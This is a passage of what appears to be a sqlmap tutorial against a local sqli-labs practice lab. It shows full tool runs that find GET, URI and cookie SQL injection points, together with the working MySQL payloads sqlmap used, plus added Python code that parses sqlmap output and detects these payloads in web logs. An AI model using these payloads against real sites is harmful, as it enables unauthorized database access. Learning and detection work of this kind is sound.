|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:14:15 /2020-02-29/

[20:14:16] [INFO] testing connection to the target URL
[20:14:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:14:16] [INFO] testing if the target URL content is stable
[20:14:16] [INFO] target URL content is stable
[20:14:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:14:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:14:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:21] [WARNING] reflective value(s) found and filtering out
[20:14:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:14:21] [INFO] testing 'Generic inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:14:21] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:14:21] [INFO] testing 'MySQL inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:14:21] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:14:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:14:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:14:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:14:32] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:14:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:14:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:14:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:14:32] [INFO] target URL appears to have 3 columns in query
[20:14:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7433=7433 AND 'hrGB'='hrGB

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8471 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8471=8471,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ygzr'='Ygzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6957 FROM (SELECT(SLEEP(5)))YTQj) AND 'ogBe'='ogBe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5025' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7171,0x586f6f6965736173736f49534a4243526a6c4c625a59534d484c6d74426d6d414b7551676b734c56,0x716a766271)-- -
---
[20:14:36] [INFO] the back-end DBMS is MySQL
[20:14:36] [INFO] fetching banner
[20:14:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:14:36] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:14:36 /2020-02-29/
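The injection-point summary sqlmap prints between the two '---' separators has the same shape in every run above, so it can be parsed for triage or for diffing results between scans. The following is an added example, not sqlmap's own code; SAMPLE_OUTPUT is a constructed excerpt in that format.

```python
"""Parse the injection-point summary sqlmap prints between the two '---'
separators (see the runs above) into structured records, so results can be
triaged or diffed between scans. Added example, not sqlmap's own code;
SAMPLE_OUTPUT is a constructed excerpt in the same format."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed excerpt in the format shown above: two injectable parameters,
# with the long UNION hex literal shortened to a placeholder (0x5858).
SAMPLE_OUTPUT = """\
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7433=7433 AND 'hrGB'='hrGB

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8471 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8471=8471,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ygzr'='Ygzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6957 FROM (SELECT(SLEEP(5)))YTQj) AND 'ogBe'='ogBe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5025' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7171,0x5858,0x716a766271)-- -

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 6632=6632 AND 'YYeb'='YYeb
---
[20:14:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
"""


@dataclass
class InjectionPoint:
    parameter: str  # 'id', '#1*', 'Cookie #1*', ...
    place: str      # 'GET', 'URI', '(custom) HEADER', ...
    type: str       # technique family (boolean-based blind, error-based, ...)
    title: str      # the specific test that succeeded
    payload: str    # the exact payload sqlmap used


PARAM_RE = re.compile(r"^Parameter:\s+(?P<parameter>.+?)\s+\((?P<place>.+)\)\s*$")
TOTAL_RE = re.compile(r"with a total of (\d+) HTTP\(s\) requests")
BANNER_RE = re.compile(r"^banner:\s+'(.*)'\s*$", re.M)


def parse_summary(text: str) -> Dict[str, object]:
    """Return request count, banner (if --banner was used) and injection points."""
    lines = text.splitlines()
    result: Dict[str, object] = {"requests": None, "banner": None, "points": []}
    m = TOTAL_RE.search(text)
    if m:
        result["requests"] = int(m.group(1))
    m = BANNER_RE.search(text)
    if m:
        result["banner"] = m.group(1)
    # The summary proper is the block between the first two '---' lines.
    seps = [i for i, line in enumerate(lines) if line.strip() == "---"]
    if len(seps) < 2:
        return result
    parameter: Optional[str] = None
    place = ""
    fields: Dict[str, str] = {}
    for line in lines[seps[0] + 1:seps[1]]:
        m = PARAM_RE.match(line)
        if m:  # a new 'Parameter: name (place)' header
            parameter, place = m["parameter"], m["place"]
            fields = {}
            continue
        key, sep, value = line.strip().partition(": ")
        if not sep or parameter is None:
            continue  # blank line or text outside a parameter block
        fields[key.lower()] = value
        if key == "Payload":  # Payload closes one Type/Title/Payload triple
            result["points"].append(InjectionPoint(
                parameter, place, fields.get("type", ""), fields.get("title", ""), value))
            fields = {}
    return result


def techniques_by_parameter(points: List[InjectionPoint]) -> Dict[str, List[str]]:
    """Map 'parameter (place)' to the list of technique families found for it."""
    out: Dict[str, List[str]] = {}
    for p in points:
        out.setdefault(f"{p.parameter} ({p.place})", []).append(p.type)
    return out


if __name__ == "__main__":
    summary = parse_summary(SAMPLE_OUTPUT)
    print(f"{summary['requests']} requests, banner {summary['banner']!r}")
    for name, techniques in techniques_by_parameter(summary["points"]).items():
        print(f"{name}: {', '.join(techniques)}")
```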


2. Setting the URI injection position in sqlmap

There is a special case when the injection point lies inside the URI itself: unless the URI path is pointed to manually, sqlmap performs no automatic testing on the URI path, so these injection points must be specified by adding an asterisk (*) on the command line.
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1&uname=admin --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:31:12 /2020-02-29/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[20:31:14] [INFO] testing connection to the target URL
[20:31:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:31:14] [INFO] testing if the target URL content is stable
[20:31:15] [INFO] target URL content is stable
[20:31:15] [INFO] testing if URI parameter '#1*' is dynamic
[20:31:15] [INFO] URI parameter '#1*' appears to be dynamic
[20:31:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:31:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:31:15] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:31:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:17] [WARNING] reflective value(s) found and filtering out
[20:31:17] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:31:17] [INFO] testing 'Generic inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:17] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:31:17] [INFO] testing 'MySQL inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:17] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:27] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:31:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:31:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:31:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:31:27] [INFO] target URL appears to have 3 columns in query
[20:31:28] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 9722=9722 AND 'aMLa'='aMLa

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4986 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4986=4986,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ocPA'='ocPA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))FboN) AND 'hyuA'='hyuA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-5390' UNION ALL SELECT NULL,CONCAT(0x716b787171,0x43554e745571626a51707163415541545a6246417749666442464676727449686b734f566966626b,0x7171767a71),NULL-- -
---
[20:31:33] [INFO] the back-end DBMS is MySQL
[20:31:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:31:34] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:31:34 /2020-02-29/

'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.

Test again with the parameter marker added:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1*&uname=admin --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:33:23 /2020-02-29/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[20:33:26] [INFO] testing connection to the target URL
[20:33:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:26] [INFO] testing if the target URL content is stable
[20:33:26] [INFO] target URL content is stable
[20:33:26] [INFO] testing if URI parameter '#1*' is dynamic
[20:33:26] [INFO] URI parameter '#1*' appears to be dynamic
[20:33:26] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:33:26] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:33:26] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:33:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:28] [WARNING] reflective value(s) found and filtering out
[20:33:28] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:33:28] [INFO] testing 'Generic inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:33:28] [INFO] testing 'MySQL inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:33:28] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:39] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:39] [INFO] target URL appears to have 3 columns in query
[20:33:39] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 6632=6632 AND 'YYeb'='YYeb

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4244 FROM(SELECT COUNT(*),CONCAT(0x7176786271,(SELECT (ELT(4244=4244,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mGsy'='mGsy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 1332 FROM (SELECT(SLEEP(5)))sgvg) AND 'BhGb'='BhGb

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-9618' UNION ALL SELECT NULL,NULL,CONCAT(0x7176786271,0x586f6d53686f797063544e70586866436d4b68544670504a415a674f675176744174494f7364754e,0x7178786271)-- -
---
[20:33:55] [INFO] the back-end DBMS is MySQL
[20:33:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:33:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:33:56 /2020-02-29/

'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.

By default, parameters in the URI are not tested; once they are marked with *, they are tested.
Test again with a cookie added:
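The payload shapes in the summaries above (a numeric tautology such as AND 7433=7433, FLOOR(RAND(0)*2), SLEEP(n), UNION ALL SELECT NULL, and the 0x71...71 hex markers that decode to q???q) are also what a defender can look for in web-server logs. The following added example, not part of the page or of sqlmap, classifies constructed Apache combined-format log lines by the technique they match; it assumes the Cookie header is logged as an extra trailing field (LogFormat with %{Cookie}i appended), because the default combined format does not record cookies and a cookie-based injection like the Less-20 test would otherwise leave no trace.

```python
"""Classify web-server access-log requests by the sqlmap technique their
payload resembles, using the payload shapes reported in the runs above.
Added example, not part of the page or of sqlmap. The log lines are
constructed in Apache 'combined' format with the Cookie header appended as
a final quoted field (assumed LogFormat with %{Cookie}i appended)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, unquote_plus

# Combined log format, plus an optional trailing quoted Cookie field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)

# One rule per technique family seen in the summaries above. All matching
# labels are reported, so a payload combining techniques gets several.
RULES = [
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I)),
    ("error-based (FLOOR)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    # numeric tautology such as AND 7433=7433
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
]
# sqlmap brackets extracted data with 5-byte hex literals that decode to q???q
# (0x716a6b7871 above is 'qjkxq'): a strong fingerprint of tool-generated payloads.
MARKER_RE = re.compile(r"0x71(?:[0-9a-f]{2}){3}71\b", re.I)

# Constructed log lines: four requests carrying payloads from the runs above
# (URL-encoded in the query string, raw in the Cookie field) and one benign request.
SAMPLE_LOG = """\
127.0.0.1 - - [29/Feb/2020:20:14:21 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%207433%3D7433%20AND%20%27hrGB%27%3D%27hrGB HTTP/1.1" 200 768 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [29/Feb/2020:20:14:28 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%20%28SELECT%206957%20FROM%20%28SELECT%28SLEEP%285%29%29%29YTQj%29%20AND%20%27ogBe%27%3D%27ogBe HTTP/1.1" 200 768 "-" "Mozilla/5.0"
127.0.0.1 - - [29/Feb/2020:20:14:32 +0800] "GET /sqli-labs/Less-1/?id=-5025%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71767a7171%2C0x5858%2C0x716a766271%29--%20- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
127.0.0.1 - - [29/Feb/2020:20:37:40 +0800] "GET /sqli-labs/Less-20/?id=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "uname=admin' AND (SELECT 4270 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4270=4270,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rvTB'='rvTB"
127.0.0.1 - - [29/Feb/2020:20:40:00 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 768 "-" "Mozilla/5.0"
""".splitlines()


def classify(text: str) -> List[str]:
    """Return the technique labels whose pattern matches the (decoded) text."""
    return [name for name, pattern in RULES if pattern.search(text)]


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line; return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # The query string is URL-encoded on the wire; decode before matching.
    decoded = unquote_plus(m["path"])
    if m["cookie"]:
        decoded += "\n" + unquote(m["cookie"])
    techniques = classify(decoded)
    marker = bool(MARKER_RE.search(decoded))
    return {
        "ip": m["ip"],
        "timestamp": m["ts"],
        "status": m["status"],
        "techniques": techniques,
        "sqlmap_marker": marker,
        # The default User-Agent names the tool, but it is trivially changed
        # (--random-agent), so treat it as a hint, never as the only signal.
        "sqlmap_ua": "sqlmap" in m["ua"].lower(),
        "suspicious": bool(techniques) or marker,
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return the analysis of every line that carries an injection signal."""
    hits = []
    for line in lines:
        info = analyze_line(line)
        if info and info["suspicious"]:
            hits.append(info)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["timestamp"], hit["ip"], hit["techniques"],
              "marker" if hit["sqlmap_marker"] else "-",
              "sqlmap-ua" if hit["sqlmap_ua"] else "-")
```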

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/?id=1 --cookie="uname=admin*" --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:37:34 /2020-02-29/

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]

[20:37:36] [INFO] testing connection to the target URL
[20:37:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:37:36] [INFO] testing if the target URL content is stable
[20:37:36] [INFO] target URL content is stable
[20:37:36] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]

[20:37:37] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[20:37:37] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[20:37:37] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:37:37] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:37:39] [WARNING] reflective value(s) found and filtering out
[20:37:39] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Login")
[20:37:39] [INFO] testing 'Generic inline queries'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:37:40] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:37:40] [INFO] testing 'MySQL inline queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:37:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
